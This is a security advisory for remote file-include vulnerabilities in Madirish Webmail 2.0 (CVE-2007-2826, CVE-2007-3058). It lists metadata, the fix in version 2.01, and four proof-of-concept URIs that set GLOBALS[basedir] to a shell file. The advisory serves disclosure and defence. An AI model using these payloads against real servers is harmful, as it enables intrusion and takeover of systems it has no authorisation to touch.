Madirish Webmail GLOBALS[basedir] Parameter Remote File Include Vulnerabilities

Bugtraq ID:	24059
Class:	Input Validation Error
CVE:	CVE-2007-2826 CVE-2007-3058
Remote:	Yes
Local:	No
Published:	May 19 2007 12:00AM
Updated:	Jun 20 2007 08:39PM
Credit:	BoZKuRTSeRDaR is credited with the discovery of the issue affecting 'lib/addressbook.php'. The other issues were reported to Symantec by the vendor.
Vulnerable:	Madirish Webmail Madirish Webmail 2.0
Not Vulnerable:	Madirish Webmail Madirish Webmail 2.01

Madirish Webmail GLOBALS[basedir] Parameter Remote File Include Vulnerabilities

Madirish Webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Madirish Webmail 2.0 is vulnerable; other versions may also be affected.

Madirish Webmail GLOBALS[basedir] Parameter Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/lib/addressbook.php?GLOBALS[basedir]=shell.txt?
http://www.example.com/[path]/calendar.php?GLOBALS[basedir]=shell.txt?
http://www.example.com/[path]/compose.php?GLOBALS[basedir]=shell.txt?
http://www.example.com/[path]/index.php?GLOBALS[basedir]=shell.txt?

Madirish Webmail GLOBALS[basedir] Parameter Remote File Include Vulnerabilities

Solution:
The vendor has addressed these issue in version 2.01. Please see the references for more information.


Madirish Webmail Madirish Webmail 2.0

• Madirish Webmail Madirish_Webmail.tgz
  http://downloads.sourceforge.net/madirishwebmail/Madirish_Webmail.tgz? modtime=1182162419&big_mirror=0

Madirish Webmail GLOBALS[basedir] Parameter Remote File Include Vulnerabilities

References:

• 2.01 Release Notes (Madirish Webmail)
  
• Project Homepage (Madirish Webmail)